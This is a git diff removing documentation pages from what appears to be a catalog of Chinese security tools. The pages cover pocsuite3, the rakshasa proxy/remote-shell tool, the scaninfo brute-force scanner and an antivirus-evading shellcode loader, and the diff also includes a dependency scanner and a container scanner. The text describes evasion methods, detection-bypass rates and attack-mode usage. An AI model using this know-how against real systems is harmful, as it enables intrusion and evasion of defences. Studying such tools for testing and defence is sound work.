-- 方式1：在项目页面，点击项目右上角的加号选择接入
-- 方式2：进入指定项目，点击右上角的创建任务按钮接入
-- 方式3：进入指定项目，点击右上角的创建任务按钮，选择其他接入方式通过模板接入
-
-### 3. 获取访问令牌
-
-> CLI 工具需要使用墨菲安全账户的`访问令牌`进行认证才能正常使用。[访问令牌是什么？（点击查看详情）](https://www.murphysec.com/docs/guides/scan-scene/cli.html)
-
-方式1：
-
-进入[墨菲安全控制台](https://www.murphysec.com/)，点击`左下角个人设置`，点击`用户token` 复制`访问令牌`
-
-<img alt="scan result" src="https://github.com/murphysecurity/murphysec/raw/v3/assets/acces-token1.png" width="80%">
-
-
-
-方式2： 任务创建页面最下方-->复制token 
-
-<img alt="scan result" src="https://github.com/murphysecurity/murphysec/raw/v3/assets/acces-token2.png" width="80%">
-
-
-
-### 4. 认证
-
-目前有两种认证方式可用：命令行交互认证、命令行参数认证
-
-#### 命令行交互认证
-执行`murphysec auth login`命令，粘贴访问令牌即可。
-
-
-> 认证后下次使用墨菲安全 CLI 无需再次执行此操作，如果需要更换访问令牌，可以重复执行此命令来覆盖旧的访问令牌。
-
-
-#### 命令行参数认证
-执行检测命令时，通过增加`--token`参数指定访问令牌进行认证
-
-### 4. 检测
-
-使用`murphysec scan`命令进行检测，可以执行以下命令：
-
-``` bash
-murphysec scan [your-project-path]
-```
-
-可用的参数
-- `--token`：指定访问令牌
-- `--log-level`：指定命令行输出流打印的日志级别，默认不打印日志，可选参数为`silent`、`error`、`warn`、`info`、`debug`
-- `--json`：指定检测的结果输出为json，默认不展示结果详情
-
-
-### 5. 查看结果
-
-CLI 工具默认不展示结果详情，可以在[墨菲安全控制台](https://www.murphysec.com/project/list)-`项目`页面查看详细的检测结果
-
-
-
-## 命令介绍
-
-### murphysec auth
-`murphysec auth` 命令主要是管理 CLI 的认证
-
-```
-Usage:
-  murphysec auth [command]
-
-Available Commands:
-  login
-  logout
-```
-
-### murphysec scan
-`murphysec scan` 命令主要用于执行检测
-
-```
-Usage:
-  murphysec scan DIR [flags]
-
-Flags:
-  -h, --help                帮助
-      --task-id string   指定本次检测归属的项目ID
-
-Global Flags:
-  -x  --allow-insecure        允许不安全的TLS连接
-      --log-level string      指定输出日志信息的级别, 可以为 silent|error|warn|info|debug (默认为 "silent"， 不输出日志)
-      --network-log           打印网络数据
-      --no-log-file           不输出日志文件
-      --server string         指定服务地址
-      --token string          指定墨菲安全服务 Token
-  -v, --version               输出 CLI 版本
-      --write-log-to string   指定日志文件的路径
-
-```
-
-## 常见问题
-
-**1. Windows下安装失败，提示“PowerShell requires an execution policy of 'RemoteSigned'”**
-
-Powershell默认不允许从远程加载安装脚本，需要使用管理员权限打开Powershell窗口，并执行`Set-ExecutionPolicy RemoteSigned -scope CurrentUser`。随后执行安装命令即可成功。
-
-**2. 为什么我的 Java（maven） 项目检测结果依赖信息不完整？**
-
-* 本地是否配置了 Maven 环境，可使用`mvn -v`查看
-* 请检查 Maven 的源是否配置正确。如果是企业内部代码，通常需要配置公司的私有源地址。一般情况下可通过修改`~/.m2/settings.xml`进行配置
-* 请检查代码目录下是否存在`pom.xml`文件，也可通过 `mvn dependency:tree --file="pom.xml"` 命令测试此项目本地是否可正常获取依赖
-
-**3. 为什么检测完依赖和缺陷组件数量都是0 ？**
-
-* 检查您的项目/文件是否在目前支持的检测范围内
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-
-## 最近更新
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/passive-scan-client.md b/detail/passive-scan-client.md
index 71839bb88..895133faa 100644
--- a/detail/passive-scan-client.md
+++ b/detail/passive-scan-client.md
@@ -3,7 +3,7 @@
 ![Language](https://img.shields.io/badge/Language-Java-blue)
 ![Author](https://img.shields.io/badge/Author-c0ny1-orange)
 ![GitHub stars](https://img.shields.io/github/stars/c0ny1/passive-scan-client.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.3.1-red)
+![Version](https://img.shields.io/badge/Version-V0.3.0-red)
 ![Time](https://img.shields.io/badge/Join-20210120-green)
 <!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
 
@@ -41,10 +41,4 @@ mvn package
 
 ## 最近更新
 
-#### [v0.3.1] - 2023-02-03
-
-**更新**  
-- 添加url黑名单  
-- 添加右键`Send to Passive Scan Client`手动转发
-
 <!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/pocsuite3.md b/detail/pocsuite3.md
deleted file mode 100644
index 721b54e95..000000000
--- a/detail/pocsuite3.md
+++ /dev/null
@@ -1,194 +0,0 @@
-## pocsuite3 <https://github.com/knownsec/pocsuite3>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![Author](https://img.shields.io/badge/Author-knownsec404-orange)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/pocsuite3.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.0.4-red)
-![Time](https://img.shields.io/badge/Join-20200821-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-## Legal Disclaimer
-Usage of pocsuite3 for attacking targets without prior mutual consent is illegal.
-pocsuite3 is for security testing purposes only
-
-## 法律免责声明
-未经事先双方同意，使用 pocsuite3 攻击目标是非法的。
-pocsuite3 仅用于安全测试目的
-
-## Overview
-
-pocsuite3 is an open-sourced remote vulnerability testing and proof-of-concept development framework developed by the [**Knownsec 404 Team**](http://www.knownsec.com/). 
-It comes with a powerful proof-of-concept engine, many nice features for the ultimate penetration testers and security researchers.
-
-## Features
-* PoC scripts can running with `verify`, `attack`, `shell` mode in different way
-* Plugin ecosystem
-* Dynamic loading PoC script from any where (local file, redis, database, Seebug ...)
-* Load multi-target from any where (CIDR, local file, redis, database, Zoomeye, Shodan ...)
-* Results can be easily exported
-* Dynamic patch and hook requests 
-* Both command line tool and python package import to use
-* IPv6 support
-* Global HTTP/HTTPS/SOCKS proxy support
-* Simple spider API for PoC script to use
-* Integrate with [Seebug](https://www.seebug.org) (for load PoC from Seebug website)
-* Integrate with [ZoomEye](https://www.zoomeye.org), [Shodan](https://www.shodan.io), etc.  (for load target use `Dork`)
-* Integrate with [Ceye](http://ceye.io/), [Interactsh](https://github.com/projectdiscovery/interactsh) (for verify blind DNS and HTTP request)
-* Friendly debug PoC scripts with IDEs
-* More ...
-
-## Screenshots
-
-### pocsuite3 console mode
-[![asciicast](https://asciinema.org/a/219356.png)](https://asciinema.org/a/219356)
-
-### pocsuite3 shell mode
-[![asciicast](https://asciinema.org/a/203101.png)](https://asciinema.org/a/203101)
-
-### pocsuite3 load PoC from Seebug 
-[![asciicast](https://asciinema.org/a/207350.png)](https://asciinema.org/a/207350)
-
-### pocsuite3 load multi-target from ZoomEye
-[![asciicast](https://asciinema.org/a/133344.png)](https://asciinema.org/a/133344)
-
-### pocsuite3 load multi-target from Shodan
-[![asciicast](https://asciinema.org/a/207349.png)](https://asciinema.org/a/207349)
-
-## Requirements
-
-- Python 3.7+
-- Works on Linux, Windows, Mac OSX, BSD, etc.
-
-## Installation
-
-Paste at a terminal prompt:
-
-### Python pip
-
-``` bash
-pip3 install pocsuite3
-
-# use other pypi mirror
-pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple pocsuite3
-```
-
-### MacOS
-
-``` bash
-brew update
-brew info pocsuite3
-brew install pocsuite3
-```
-
-### [Debian](https://tracker.debian.org/pkg/pocsuite3), [Ubuntu](https://launchpad.net/ubuntu/+source/pocsuite3), [Kali](http://pkg.kali.org/pkg/pocsuite3)
-
-``` bash
-sudo apt update
-sudo apt install pocsuite3
-```
-
-### Docker
-
-```
-docker run -it pocsuite3/pocsuite3
-```
-
-### ArchLinux
-
-``` bash
-yay pocsuite3
-```
-
-###
-
-Or click [here](https://github.com/knownsec/pocsuite3/archive/master.zip) to download the latest source zip package and extract
-
-``` bash
-wget https://github.com/knownsec/pocsuite3/archive/master.zip
-unzip master.zip
-cd pocsuite3-master
-pip3 install -r requirements.txt
-python3 setup.py install
-```
-
-
-The latest version of this software is available at: https://pocsuite.org
-
-## Documentation
-
-Documentation is available at: https://pocsuite.org
-
-## Usage
-
-```
-cli mode
-
-	# basic usage, use -v to set the log level
-	pocsuite -u http://example.com -r example.py -v 2
-
-	# run poc with shell mode
-	pocsuite -u http://example.com -r example.py -v 2 --shell
-
-	# search for the target of redis service from ZoomEye and perform batch detection of vulnerabilities. The threads is set to 20
-	pocsuite -r redis.py --dork service:redis --threads 20
-
-	# load all poc in the poc directory and save the result as html
-	pocsuite -u http://example.com --plugins poc_from_pocs,html_report
-
-	# load the target from the file, and use the poc under the poc directory to scan
-	pocsuite -f batch.txt --plugins poc_from_pocs,html_report
-
-	# load CIDR target
-	pocsuite -u 10.0.0.0/24 -r example.py
-
-	# the custom parameters `command` is implemented in ecshop poc, which can be set from command line options
-	pocsuite -u http://example.com -r ecshop_rce.py --attack --command "whoami"
-
-console mode
-    poc-console
-```
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-- 2023-07-18 发布演示视频[404星链计划开源安全工具演示——pocsuite3](https://www.bilibili.com/video/BV1gz4y1E7j1/)
-- 2022-07-13 发布文章[《Pocsuite3 入门教程》](https://paper.seebug.org/1931/)
-
-## 最近更新
-
-#### [v2.0.4] - 2023-04-29
-
-**更新**  
-- 兼容 nuclei v2.9.1 的模版协议名称变化
-
-#### [v2.0.3] - 2023-03-21
-
-**更新**  
-- 优化对 URL 协议的自动纠正  
-- 支持通过 --no-check 选项禁用 URL 协议自动纠正和蜜罐检查
-
-#### [v2.0.2] - 2022-12-13
-
-**更新**  
-- 修复 _check 方法中 url 重定向的问题  
-- 修复 console 模式下 use 命令使用绝对路径的问题  
-- 修复 build_url 兼容 ipv6 的问题  
-- 优化 nuclei DSL 表达式执行
-
-#### [v2.0.1] - 2022-11-09
-
-**更新**
-  - 修复 words 匹配器表达式执行的问题  
-- 修复模版中包含中文异常捕获的问题  
-- 提高模版的鲁棒性  
-- 支持 digest_username 和 digest_password，用于 http 认证  
-- 支持 negative 反向匹配器
-
-#### [v2.0.0] - 2022-11-03
-
-**更新**  
-- 支持 yaml 格式 poc，与 nuclei 的 poc 模版兼容  
-- 修复 httpserver 模块在 macos 平台卡住的问题  
-- 结合 http 状态码对 http/https 协议自动纠正
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/rakshasa.md b/detail/rakshasa.md
deleted file mode 100644
index 18462bfe3..000000000
--- a/detail/rakshasa.md
+++ /dev/null
@@ -1,207 +0,0 @@
-## rakshasa <https://github.com/Mob2003/rakshasa>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![Author](https://img.shields.io/badge/Author-Mob2003-orange)
-![GitHub stars](https://img.shields.io/github/stars/Mob2003/rakshasa.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.2.3-red)
-![Time](https://img.shields.io/badge/Join-20230410-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-rakshasa是一个使用Go语言编写的强大多级代理工具，专为实现**多级代理**，**内网穿透**而设计。它可以在节点群里面任意两个节点之间转发TCP请求和响应，同时支持**socks5代理**，**http代理**，并且可以**引入外部http、socks5代理池，自动切换请求IP**。
-
-节点之间使用内置证书的TLS加密TCP通讯，再叠加一层自定义秘钥的AES加密，可以在所有Go支持的平台使用。可以在你所有的的Windows和Linux服务器上搭建节点并组成节点群网络。
-
-节点分为普通节点(node)与控制节点(fullnode)
-- 普通节点，无法控制其他节点进行代理、shell等操作
-- 控制节点，全功能节点
-
-## 项目结构示例和截图
-[点击查看更多介绍](https://github.com/Mob2003/rakshasa/blob/main/readme/rakshasa%E9%A1%B9%E7%9B%AE%E8%AE%BE%E8%AE%A1.md)
-
-[win10+Proxifier实现内网穿透](https://github.com/Mob2003/rakshasa/blob/main/readme/rakshasa%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F--win10+Proxifier%E4%BD%BF%E7%94%A8%E6%A1%88%E4%BE%8B.md)
-
-## 版本迭代
--  **v0.1.0**  2023-03-28
-    - 首次发布
--  **v0.2.0**  2023-04-02
-    - 更改为fullnode版本，fullnode为全功能版本可以控制别人也能被控
-    - 增加node版本，去掉私钥，无法发起代理等关键操作，适合被控
-    - 增加lite版本，在上面版本的基础上，精简cli交互与http代理池，体积缩小2mb
-    - 优化节点连接逻辑，并且遍历网卡ip进行net.Dail，解决多网卡下，无法连接的问题
--  **v0.2.2**  2023-04-08
-    - 增加http_proxy重连逻辑，节点掉线后重连http代理能够正常重连使用
-    - 优化节点重连逻辑
-    - 增加uuid选项，默认uuid使用网卡mac作为随机数种子，进行生成
-
-## 编译与使用
-
-生成新的证书，编译所有版本节点
-```shell
-go run build.go -all
-```
-
-编译所有版本节点（不更新证书）
-```shell
-go run build.go -all -nocert
-```
-
-生成覆盖证书
-```shell
-go run build.go -gencert
-```
-
-生成控制节点与普通节点
-```shell
-go run build.go -fullnode
-```
-
-只生成普通节点
-```shell
-go run build.go -node
-```
-
-证书保存在cert目录下，可以使用第三方工具生成，请使用RSA PKCS1-V1.5
-```shell
-private.go     --编译普通节点的时候要删除此文件
-private.pem  --与public.pem对应的公钥私钥，普通节点不包含私钥
-public.pem
-server.crt     --tls通讯证书
-server.key    --tls通讯私钥
-```
-## 版本区别
-
-|     | fullnode  | node|fullnode_lite|node_lite|
-|  ----  | ----  |----  |----  |----  |
-|连接其他节点  | √ |√ |√ |√ |
-|启动本地socks5代理 | √ |√ |√ |√ |
-|启动本地http代理 | √ |√ |√ |√ |
-|启动多层代理 | √ |× |√ |× |
-|远程shell| √ |× |√ |× |
-|其他远程功能| √ |× |√ |× |
-| 交互式CLI  | √ |√ |× |× |
-| check_proxy  | √ |√ |× |× |
-
-简单来讲
-- fullnode 完全版，能控制别人，也能被控
-- node 能连接其他节点，但是不能对其他节点操控，适合作为被控端
-- lite版本，精简掉cli和net/http，与一些debug的代码
-
-## 使用图示
-![image](https://user-images.githubusercontent.com/128351726/226882870-f4f3cbc0-61df-486c-afc0-511d87586402.png)
-
-
-## 使用方法
-
-
-
-### 启动一个带CLI节点
-不带任何参数即可启动：
-```shell
-d:\>rakshasa.exe
-start on port: 8883
-rakshasa>
-rakshasa>help
-
-Commands:
-  bind              进入bind功能
-  clear             clear the screen
-  config            配置管理
-  connect           进入connect功能
-  exit              exit the program
-  help              display help
-  httpproxy         进入httpProxy功能
-  new               与一个或者多个节点连接，使用方法 new ip:端口 多个地址以,间隔 如1080 127.0.0.1:1081,127.0.0.1:1082
-  ping              ping 节点
-  print             列出所有节点
-  remoteshell       远程shell
-  remotesocks5      进入remotesocks5功能
-  shellcode         执行shellcode
-  socks5            进入socks5功能
-
-
-rakshasa>
-```
-请查阅[CLI使用说明](https://github.com/Mob2003/rakshasa/blob/main/readme/cli.md)了解详细信息
-
-## 其他启动参数说明
-### -nocli
-在无法后台执行的情况下，启动一个不带 CLI 的节点:
-```shell
-nohup /root/rakshasa -nocli > /root/rakshasa.log 2>&1 &
-#Linux下配合nohup后台执行
-```
-
-### -p 端口
-以指定端口启动:
-```shell
-rakshasa -p 8883
-```
-
-### -d ip:port,ip:port...
-连接下一层代理或更多层代理，多个地址以逗号隔开，生效在最后一个 ip:port：
-```shell
-rakshasa -d 192.168.1.1:8883,192.168.1.2:8883,192.168.1.3:8883 -socks5 1080
-#从本地1080端口启动一个socks5代理，流量通过三层转发ip最后在192.168.1.3请求目标数据
-```
-
-### -socks5 用户名:密码@ip:端口 
-本地开启SOCKS5代理穿透到远程节点，可以不带-d：
-```shell
-rakshasa -socks5 1080 
-#不使用-d参数，则表示直接在本机启动一个socks5代理
-```
-
-
-
-### -remotesocks5 端口 
-远程开启SOCKS5代理流量出口到本地：
-```shell
-rakshasa -remotesocks5 1081  -d 192.168.1.2:1080,192.168.1.3:1080
-#方向从右往左(加上本机是3个节点)，在192.168.1.3这台机器开启一个socks5端口1081，流量穿透到本地节点出去
-```
-
-### -connect ip:port,remote_ip:remote_port 
-本地监听并转发到指定 IP 端口，使用场景为本机连接 teamserver，隐藏本机 IP：
-```shell
-rakshasa -connect 127.0.0.1:50050,192,168,1,2:50050 -d 192.168.1.3:1080,192.168.1.4:1080 
-#本机cs连接127.0.0.1:50050实际上通过1.3,1.4节点后，再连接到192.168.1.2:50050 teamserver，teamserver看到你的ip是最后一个节点的ip
-```
-
-### -bind  ip:port,remote_ip:remote_port
-反向代理模式，必须配合-d使用：
-```shell
-rakshasa -bind 192.168.1.2:50050,0,0,0.0:50050 -d 192.168.1.3:1080,192.168.1.4:1080
-#与上面相反，在最右端节点监听端口50050，流量到本机节点后，最终发往192.168.1.2，最终上线ip为本机ip
-```
-### -http_proxy 用户名:密码@ip:端口
-启动一个http代理，可以不使用-d，建议配合-http_proxy_pool使用代理池，自动切换代理ip：
-```shell
-rakshasa -http_proxy 8080 -http_proxy_pool out.txt
-```
-
-### -password 密钥
-各节点除了证书校验之外，还额外支持密钥连接，建议使用并定期更换密钥，以避免二进制泄露后被别人连上
-```shell
-rakshasa -password 123456
-```
-
-
-### -f yaml文件 [详细说明](https://github.com/Mob2003/rakshasa/blob/main/readme/config.md)
-指定配置文件启动。
-
-### -help 
-更多启动参数使用帮助
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-
-## 最近更新
-
-#### [v0.2.3] - 2023-04-23
-
-**更新**  
-- 优化一个连接失败可能会导致nil的bug  
-- 修改一个nodeMap为sync.Map以减少代码里面lock的使用
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/scaninfo.md b/detail/scaninfo.md
deleted file mode 100644
index c2e7e0352..000000000
--- a/detail/scaninfo.md
+++ /dev/null
@@ -1,115 +0,0 @@
-## scaninfo <https://github.com/redtoolskobe/scaninfo>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![Author](https://img.shields.io/badge/Author-华东360安服团队-orange)
-![GitHub stars](https://img.shields.io/github/stars/redtoolskobe/scaninfo.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.1.0-red)
-![Time](https://img.shields.io/badge/Join-20220316-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-开源、轻量、快速、跨平台 的红队内外网打点扫描器
-
-## 注意的点
-
-- 漏洞扫描的时候有时候最后几个任务会卡住，是因为ftp爆破模块，这个fscan也一样目前没有好的解决办法，后续更新.先阶段可以-eq 21跳过ftp，或者control+c 主动停止不影响结果保存。
-- 有时候扫外网的全端口会漏掉端口可以使用-n 指定线程为500，400，默认为900.网络好的话900-1000都是没有问题
-- 关于结果报告 xlsx 文件是当你control+c 主动停止或任务正常结束时才会写入。txt文件是实时写入。
-
-
-## 项目说明
-
->  为何有这个项目
-
-在渗透测试的端口扫描阶段，相信很多人遇到的问题是nmap太慢，masscan不准确。难以在速度与准确度之间寻找一个平衡。 其实有个工具不错就是[TXPortMap](https://github.com/4dogs-cn/TXPortMap)。但是没有进度条当大量扫描的时候结果处理也太友好。
-
-在内网这块[fscan](https://github.com/shadow1ng/fscan)算是一款很优秀的工具但也有一些问题，如端口扫描不支持服务识别等。
-
-指纹这块[EHole](https://github.com/EdgeSecurityTeam/EHole)也算一款很优秀的工具
-
-## 如何解决这个问题
-
-- scaninfo 专门解决上述问题并对上述项目代码进行了优化与重构，快速的端口扫描和服务识别比masscan更快。
-
-- 包含fscan的绝大部份功能除了poc扫描和自定义字典
-
-- 更好的web探测与指纹识别
-
-- 更好的报告输出
-
-## 使用说明
-
-![image-20211105132301924](https://github.com/redtoolskobe/scaninfo/raw/main/infoscan.assets/image-20211105132301924.png)
-
-> 常见的参数
-
-```shell
-scaninfo -uf  url.txt -m  webfinger  web指纹识别
-```
-
-```shell
-scaninfo  -i  192.168.0.0/24  -p  1-65535  -eq 53  -m port 端口扫描
-```
-
-```shell
-scaninfo  -i  192.168.0.0/24  -l ip.txt  -uf  url.txt -t1000   可以组合各种目标ip段ip文件url文件 
-```
-
-## 报告
-
-> 报告主要是直观的excel并对每一种类型进行分类。同时也会生成txt json格式的结果。
-
-![image-20211105134827966](https://github.com/redtoolskobe/scaninfo/raw/main/infoscan.assets/image-20211105134827966.png)
-
-![image-20211105134954709](https://github.com/redtoolskobe/scaninfo/raw/main/infoscan.assets/image-20211105134954709.png)
-
-## 参数
-
->  主要参数
-
-| 参数  | 说明                             |
-| ----- | -------------------------------- |
-| -ei   | 排除某IP                         |
-| -eq   | 排除某端口                       |
-| -l    | 指定IP文件                       |
-| -uf   | 指定要web指纹识别的url文件       |
-| -ff   | 指定指纹文件默认使用内置         |
-| -o    | 指定保存的结果文件默认为result   |
-| -p    | 指定端口默认使用top100           |
-| -m    | 指定扫描的模块默认为全部         |
-| -pt   | 指定ping 探测存活的线程          |
-| -vt   | 指定web指纹扫描的线程默认500     |
-| -n    | 指定端口扫描的线程默认900        |
-| -show | 查看扫描支持的模块               |
-| -t    | 端口扫描tcp连接的超时时间默认0.5 |
-| -np   | 跳过存活探测                     |
-
-> 模块说明
-
-| 模块      | 说明                                |
-| --------- | ----------------------------------- |
-| ftp       | ftp弱口令探测                       |
-| ssh       | ssh弱口令探测                       |
-| smb       | smb弱口令探测                       |
-| mssql     | mssql弱口令探测                     |
-| mysql     | mysql弱口令探测                     |
-| mgo       | mongodb弱口令探测                   |
-| redis     | redis弱口令探测                     |
-| psql      | psql弱口令探测                      |
-| ms17010   | ms17010探测                         |
-| smbghost  | smbghost探测                        |
-| webfinger | web指纹识别                         |
-| netbios   | netbios探测，可以识别主机名发现域控 |
-| findnet   | oxid                                |
-| all       | 所有                                |
-| port      | 端口扫描                            |
-| ping      | ping 存活                           |
-| mem       | memcached弱口令                     |
-
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-
-## 最近更新
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/shellcodeloader.md b/detail/shellcodeloader.md
deleted file mode 100644
index 9060ebcce..000000000
--- a/detail/shellcodeloader.md
+++ /dev/null
@@ -1,139 +0,0 @@
-## shellcodeloader <https://github.com/knownsec/shellcodeloader>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-C++-blue)
-![Author](https://img.shields.io/badge/Author-m0ngo0se@knownsec404-orange)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/shellcodeloader.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.1-red)
-![Time](https://img.shields.io/badge/Join-20201125-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-
-# ShellcodeLoader
-
-Language： [English](https://github.com/knownsec/shellcodeloader/blob/master/Readme.md) 
-
-Windows平台的shellcode免杀加载器。
-
-## 功能特点
-
-1. 自带多种加载方式。32位自带13种加载方式，64位自带12种加载方式。
-
-2. 支持拓展。如果发现新的利用方式，按指定方式开发模板即可。
-
-3. shellcode自动随机加密。使用时间为种子，生成128位密钥进行加密，相同shellcode出来的加载器的md5也不相同。
-
-   
-
-## 编译环境和方法
-
-   环境:生成器使用MFC实现UI，生成器和加载器模板均使用C++开发，VS2015静态编译。
-
-   方法:使用VS2015打开项目的解决方案(.sln)，再进行编译即可。你也可以从[realse](https://github.com/knownsec/shellcodeloader/releases/)下载成品。
-
-
-
-## 文件组成
-
-  本工具由生成器(shellcodeLoader.exe),和众多加载器模板组成。不同的加载器模板需放入对应位数的目录。并最终放入生成器同目录下的DATA目录。
-
-<img src="https://github.com/knownsec/shellcodeloader/raw/master/Readme.assets/image-20201124160121278.png" alt="image-20201124160121278" style="zoom:80%;" />
-
-
-## 使用方法
-
-1. **打开生成器**
-
-   ![image-20201124160202106](https://github.com/knownsec/shellcodeloader/raw/master/Readme.assets/image-20201124160202106.png)
-
-   
-
-2. **将想要加载的shellcode源文件(.bin)拖入该窗口**
-
-   ![image-20201124160330548](https://github.com/knownsec/shellcodeloader/raw/master/Readme.assets/image-20201124160330548.png)
-
-   
-
-3. **勾选加载器的运行位数，并选择你需要的配置选项，是否需要自启动(自带方式皆为注册表方式自启动)，是否需要反沙箱(64位下多数杀软不需要该选项即可免杀)**
-
-   
-
-4. **选择你想要的加载方式，不同位数下的加载方式会有不同，其取决于DATA目录下对应的加载器模板。**
-
-   ![image-20201124160839607](https://github.com/knownsec/shellcodeloader/raw/master/Readme.assets/image-20201124160839607.png)
-
-   
-
-5. **点击生成，则会在桌面生成最终的加载器。**
-
-   ![image-20201124161035698](https://github.com/knownsec/shellcodeloader/raw/master/Readme.assets/image-20201124161035698.png)
-
-## 拓展方法
-
-1. 在你新的模板源文件前包含public.hpp.
-
-   
-
-2. 调用GetShellcodeFromRes()函数获取shellcode信息,注意100不可更改，除非你改了生成器中的资源序号。
-
-   ![image-20201124162327193](https://github.com/knownsec/shellcodeloader/raw/master/Readme.assets/image-20201124162327193.png)
-
-   其返回shellcode的数据指针，并且，shellcodeSize就是shellcode的大小。多数情况下，这一步是不需要进行更改的，你可以在获取shellcode之后做任何事。
-
-   
-
-3. 按照你需要的方法加载shellcode，完成后进行编译(PS:请确保你进行了静态编译，且取消了调试符号链接).
-
-   ![image-20201124162721783](https://github.com/knownsec/shellcodeloader/raw/master/Readme.assets/image-20201124162721783.png)
-
-   
-
-4. 将编译出来的文件进行指定命名,这里的命名就是UI上最终现实的加载方式名称，并将其后缀改为DAT，放入指DATA目录下指定位数的目录中，生成器会自动获取该加载方式。
-
-   ![image-20201124162912373](https://github.com/knownsec/shellcodeloader/raw/master/Readme.assets/image-20201124162912373.png)
-
-   
-
-###  关于public.hpp
-
-  public.hpp源码中含有必要的注释。如果你想要其他的方式进行反沙箱,你可以更改antisandbox中的函数；如果你想要其他方式自启动，你可以更改autostart函数中的内容。其他函数体的内容多数情况下是不需要更改的。
-
-
-
-## 使用效果
-
-VT检测效果，均以CS原始shellcode，并不勾选反沙箱为例：
-
-| 加载方式                 | 未绕过率 |
-| ------------------------ | -------- |
-| CreateThreadpoolWait加载 | 3/72     |
-| Fiber加载                | 4/72     |
-| NtTestAlert加载          | 5/70     |
-| SEH异常加载              | 2/72     |
-| TLS回调加载              | 28/71    |
-| 动态加载                 | 1/72     |
-| 动态加载plus             | 28/71    |
-| 系统call加载             | 1/69     |
-| APC注入加载              | 6/72     |
-| Early Brid APC注入加载   | 4/72     |
-| NtCreateSection注入加载  | 2/71     |
-| 入口点劫持注入加载       | 3/72     |
-| 线程劫持注入加载         | 6/72     |
-
-在动态加载方式勾选反沙箱之后，结果如下：
-
-![1fef278889c961331a185698c35d220](https://github.com/knownsec/shellcodeloader/raw/master/Readme.assets/1fef278889c961331a185698c35d220.png)
-
-
-
-使用该加载器bypass诺顿的智能防火墙出网拦截，并上线:
-
-![image-20201124163815942](https://github.com/knownsec/shellcodeloader/raw/master/Readme.assets/image-20201124163815942.png)
-
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-
-## 最近更新
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/veinmind-tools.md b/detail/veinmind-tools.md
deleted file mode 100644
index 39731a9eb..000000000
--- a/detail/veinmind-tools.md
+++ /dev/null
@@ -1,151 +0,0 @@
-## veinmind-tools <https://github.com/chaitin/veinmind-tools>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Golang/Python-blue)
-![Author](https://img.shields.io/badge/Author-长亭科技-orange)
-![GitHub stars](https://img.shields.io/github/stars/chaitin/veinmind-tools.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.1.5-red)
-![Time](https://img.shields.io/badge/Join-20220316-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-veinmind-tools 是由长亭科技自研，牧云团队孵化，基于 <a href="https://github.com/chaitin/libveinmind">veinmind-sdk</a> 打造的容器安全工具集
-
-veinmind, 中文名为<b>问脉</b>，寓意 <b>容器安全见筋脉，望闻问切治病害。</b> 旨在成为云原生领域的一剂良方
-
-
-中文文档 | <a href="README.en.md">English</a>
-
-## 🔥 Demo
-![](https://veinmind-cache.oss-cn-hangzhou.aliyuncs.com/img/scan.gif)
-
-问脉已接入 openai, 可以使用 openai 对扫描的结果进行人性化分析，让您更加清晰的了解本次扫描发现了哪些风险。
-
-![](https://veinmind-cache.oss-cn-hangzhou.aliyuncs.com/img/ai.png)
-
-## 🕹️ 快速开始
-### 1. 确保机器上正确安装 docker
-```
-docker info
-```
-### 2. 安装 [veinmind-runner](https://github.com/chaitin/veinmind-tools/tree/master/veinmind-runner) 镜像
-```
-docker pull registry.veinmind.tech/veinmind/veinmind-runner:latest
-```
-### 3. 下载 [veinmind-runner](https://github.com/chaitin/veinmind-tools/tree/master/veinmind-runner) 平行容器启动脚本
-```
-wget -q https://download.veinmind.tech/scripts/veinmind-runner-parallel-container-run.sh -O run.sh && chmod +x run.sh
-```
-### 4. 快速扫描本地镜像/容器
-```
-./run.sh scan [image/container]
-```
-### 5. 使用 openAI 智能分析
-```
-./run.sh scan [image/container] --enable-analyze --openai-token  <your_openai_token>
